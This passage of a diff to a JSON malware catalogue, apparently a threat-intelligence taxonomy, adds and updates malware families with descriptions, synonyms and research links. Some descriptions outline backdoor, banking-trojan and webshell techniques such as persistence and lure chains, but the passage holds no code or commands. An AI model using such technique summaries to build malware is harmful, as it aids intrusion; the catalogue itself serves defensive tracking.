"Cisco Talos identifies GPlayed as a malware written in .NET using the Xamarin environment for mobile applications. It is considered powerful because of its capability to adapt after its deployment. In order to achieve this adaptability, the operator has the capability to remotely load plugins, inject scripts and even compile new .NET code that can be executed. ", "meta": { @@ -357,6 +466,20 @@ "uuid": "13dc1ec7-aba7-4553-b990-8323405a1d32", "value": "GPlayed" }, + { + "description": "Group-IB describes Gustuff as a mobile Android Trojan, which includes potential targets of customers in leading international banks, users of cryptocurrency services, popular ecommerce websites and marketplaces. Gustuff has previously never been reported. Gustuff is a new generation of malware complete with fully automated features designed to steal both fiat and crypto currency from user accounts en masse. The Trojan uses the Accessibility Service, intended to assist people with disabilities.\r\nThe analysis of Gustuff sample revealed that the Trojan is equipped with web fakes designed to potentially target users of Android apps of top international banks including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India and users of 32 cryptocurrency apps.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.gustuff", + "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "https://www.group-ib.com/media/gustuff/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a5e2b65f-2087-465d-bf14-4acf891d5d0f", + "value": "Gustuff" + }, { "description": "", "meta": { @@ -475,6 +598,19 @@ "uuid": "4793a29b-1191-4750-810e-9301a6576fc4", "value": "LokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.luckycat", + "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1785a4dd-4044-4405-91c2-efb722801867", + "value": "LuckyCat" + }, { "description": "", "meta": { @@ -574,6 +710,19 @@ "uuid": "3272a8d8-8323-4e98-b6ce-cb40789a3616", "value": "Fake Pornhub" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.premier_rat", + "https://twitter.com/LukasStefanko/status/1084774825619537925" + ], + "synonyms": [], + "type": [] + }, + "uuid": "661471fe-2cb6-4b83-9deb-43225192a849", + "value": "Premier RAT" + }, { "description": "", "meta": { @@ -593,7 +742,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.redalert2", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/red-alert-2-0-android-trojan-spreads-via-third-party-app-stores", - "https://clientsidedetection.com/new_android_trojan_targeting_over_60_banks_and_social_apps.html" + "https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html" ], "synonyms": [], "type": [] @@ -647,6 +796,19 @@ "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", "value": "Rootnik" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.sauron_locker", + "https://twitter.com/LukasStefanko/status/1117795290155819008" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a7c058cf-d482-42cf-9ea7-d5554287ea65", + "value": "Sauron Locker" + }, { "description": "", "meta": { @@ -781,6 +943,21 @@ "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", "value": "Switcher" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.talent_rat", + "https://twitter.com/LukasStefanko/status/1118066622512738304" + ], + "synonyms": [ + "Assassin RAT" + ], + "type": [] + }, + "uuid": "46151a0d-aa0a-466c-9fff-c2c3474f572e", + "value": "TalentRAT" + }, { "description": "", "meta": { @@ -855,7 +1032,7 @@ "value": "Triada" }, { - "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware’s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", + "description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout", @@ -934,6 +1111,20 @@ "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", "value": "Xbot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xloader", + "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/a-look-into-the-connection-between-xloader-and-fakespy-and-their-possible-ties-with-the-yanbian-gang/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ba6a2d9-c1c7-482a-b888-b2871c5c5e25", + "value": "XLoader" + }, { "description": "", "meta": { @@ -947,6 +1138,32 @@ "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", "value": "XRat" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth", + "https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a2dad59d-2355-415c-b4d6-62236d3de4c7", + "value": "YellYouth" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen", + "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "46d6d102-fc38-46f7-afdc-689cafe13de5", + "value": "Zen" + }, { "description": "", "meta": { @@ -978,6 +1195,36 @@ "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", "value": "Ztorg" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", + "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", + "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/" + ], + "synonyms": [ + "HyperShell" + ], + "type": [] + }, + "uuid": "a98a04e5-1f86-44b8-91ff-dbe1534782ba", + "value": "TwoFace" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d4318f40-a39a-4ce0-8d3c-246d9923d222", + "value": "Unidentified ASP 001 (Webshell)" + }, { "description": "", "meta": { @@ -1071,15 +1318,34 @@ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (ELF)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r", + "https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html", + "https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/", + "https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html" + ], + "synonyms": [ + "CriptTor" + ], + "type": [] + }, + "uuid": "196b20ec-c3d1-4136-ab94-a2a6cc150e74", + "value": "Cr1ptT0r" + }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", + "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", - "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" + "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/" ], "synonyms": [], "type": [] @@ -1113,6 +1379,19 @@ "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot", + "https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "501e5434-5796-4d63-8539-d99ec48119c2", + "value": "FBot" + }, { "description": "", "meta": { @@ -1165,11 +1444,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", + "https://threatlabs.avast.com/botnet", + "https://blog.avast.com/hide-n-seek-botnet-continues", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", - "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/" + "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", + "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html" ], "synonyms": [ "HNS" @@ -1239,12 +1521,29 @@ "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, + { + "description": "Masuta takes advantage of the EDB 38722 D-Link exploit.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.masuta", + "https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/", + "https://blog.newskysecurity.com/masuta-satori-creators-second-botnet-weaponizes-a-new-router-exploit-2ddc51cc52a7", + "https://www.virusbulletin.com/virusbulletin/2018/12/vb2018-paper-tracking-mirai-variants/#h2-appendix-sample-sha256-hashes" + ], + "synonyms": [ + "PureMasuta" + ], + "type": [] + }, + "uuid": "b9168ff8-01df-4cd0-9f70-fe9e7a11eccd", + "value": "Masuta" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", - "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" + "https://securitykitten.github.io/2016/12/14/mikey.html" ], "synonyms": [], "type": [] @@ -1265,7 +1564,8 @@ "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/", + "https://unit42.paloaltonetworks.com/mirai-compiled-for-new-processor-surfaces/" ], "synonyms": [], "type": [] @@ -1377,6 +1677,19 @@ "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, + { + "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy", + "https://github.com/n1nj4sec/pupy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "92a1288f-cc4d-47ca-8399-25fe5a39cf2d", + "value": "pupy (ELF)" + }, { "description": "", "meta": { @@ -1474,6 +1787,19 @@ "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.speakup", + "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3ccd3143-c34d-4680-94b9-2cc4fa4f86fa", + "value": "SpeakUp" + }, { "description": "", "meta": { @@ -1500,6 +1826,19 @@ "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sunless", + "https://www.securityartwork.es/2019/01/09/analisis-de-linux-sunless/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d03fa69b-53a4-4f61-b800-87e4246d2656", + "value": "Sunless" + }, { "description": "", "meta": { @@ -1533,16 +1872,18 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report", - "https://www.8ackprotect.com/blog/big_brother_is_attacking_you" + "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", + "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/" ], "synonyms": [ "Amnesia", + "Muhstik", "Radiation" ], "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami" + "value": "Tsunami (ELF)" }, { "description": "", @@ -1670,9 +2011,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", - "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", - "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", - "https://en.wikipedia.org/wiki/Xor_DDoS" + "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" ], "synonyms": [], "type": [] @@ -1695,6 +2036,23 @@ "uuid": "9218630d-0425-4b18-802c-447a9322990d", "value": "Zollard" }, + { + "description": "Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad", + "https://github.com/Hopfengetraenk/Fas-Disasm", + "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft" + ], + "synonyms": [ + "Acad.Bursted", + "Duxfas" + ], + "type": [] + }, + "uuid": "fb22d876-c6b5-4634-a468-5857088d605c", + "value": "AutoCAD Downloader" + }, { "description": "", "meta": { @@ -1739,6 +2097,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "http://malware-traffic-analysis.net/2017/07/04/index.html", @@ -1759,6 +2118,21 @@ "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", + "https://colin.guru/index.php?title=Advanced_Banload_Analysis", + "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload" + ], + "synonyms": [], + "type": [] + }, + "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043", + "value": "Banload" + }, { "description": "", "meta": { @@ -1775,14 +2149,41 @@ "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat", + "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3724d5d0-860d-4d1e-92a1-0a7089ca2bb3", + "value": "FEimea RAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", + "https://twitter.com/r3c0nst/status/1111254169623674882" + ], + "synonyms": [], + "type": [] + }, + "uuid": "71286008-9794-4dcc-a571-164195390c39", + "value": "JavaDispCash" + }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://github.com/java-rat", - "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" + "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/" ], "synonyms": [ "Jacksbot" @@ -1819,6 +2220,19 @@ "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", + "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb", + "value": "Qealler" + }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { @@ -1851,12 +2265,29 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot", + "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" + ], + "synonyms": [ + "BlazeBot" + ], + "type": [] + }, + "uuid": "651e37e0-1bf8-4024-ac1e-e7bda42470b0", + "value": "SupremeBot" + }, + { + "description": "AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" ], - "synonyms": [], + "synonyms": [ + "Orz" + ], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", @@ -1875,11 +2306,25 @@ "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, + { + "description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7ebeb691-b979-4a88-94e1-dade780c6a7f", + "value": "BELLHOP" + }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", + "https://www.codercto.com/a/46729.html", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], @@ -1917,6 +2362,35 @@ "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", "value": "CukieGrab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat", + "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [ + "DNSbot" + ], + "type": [] + }, + "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e", + "value": "DNSRat" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3", + "value": "EVILNUM (Javascript)" + }, { "description": "", "meta": { @@ -1950,7 +2424,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", - "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" + "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", + "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/" ], "synonyms": [], "type": [] @@ -1968,6 +2444,7 @@ "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" ], @@ -1979,6 +2456,22 @@ "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, + { + "description": "NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", + "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", + "https://attack.mitre.org/software/S0228/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", + "value": "NanHaiShu" + }, { "description": "", "meta": { @@ -2006,6 +2499,19 @@ "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, + { + "description": "SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", + "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", + "value": "SQLRat" + }, { "description": "", "meta": { @@ -2059,6 +2565,19 @@ "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", + "https://securelist.com/operation-applejeus/87553/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5", + "value": "AppleJeus" + }, { "description": "", "meta": { @@ -2171,6 +2690,19 @@ "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer", + "https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a8e71805-014d-4998-b21e-3125da800124", + "value": "DarthMiner" + }, { "description": "", "meta": { @@ -2198,6 +2730,19 @@ "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", "value": "Dummy" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", + "https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c221e519-fe3e-416e-bc63-a2246b860958", + "value": "Eleanor" + }, { "description": "", "meta": { @@ -2212,6 +2757,19 @@ "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale", + "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c", + "value": "FailyTale" + }, { "description": "", "meta": { @@ -2482,6 +3040,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" @@ -2514,6 +3073,7 @@ "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" ], "synonyms": [ + "FileCoder", "Findzip" ], "type": [] @@ -2521,13 +3081,27 @@ "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", "value": "Patcher" }, + { + "description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized", + "https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "de13bec0-f443-4c5a-91fe-2223dad43be5", + "value": "PintSized" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/", - "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf" + "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", + "https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf" ], "synonyms": [], "type": [] @@ -2572,7 +3146,7 @@ "value": "Pwnet" }, { - "description": "", + "description": "Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", @@ -2602,6 +3176,19 @@ "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", "value": "systemd" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami", + "https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "59d4a2f3-c66e-4576-80ab-e04a4b0a4317", + "value": "Tsunami (OS X)" + }, { "description": "", "meta": { @@ 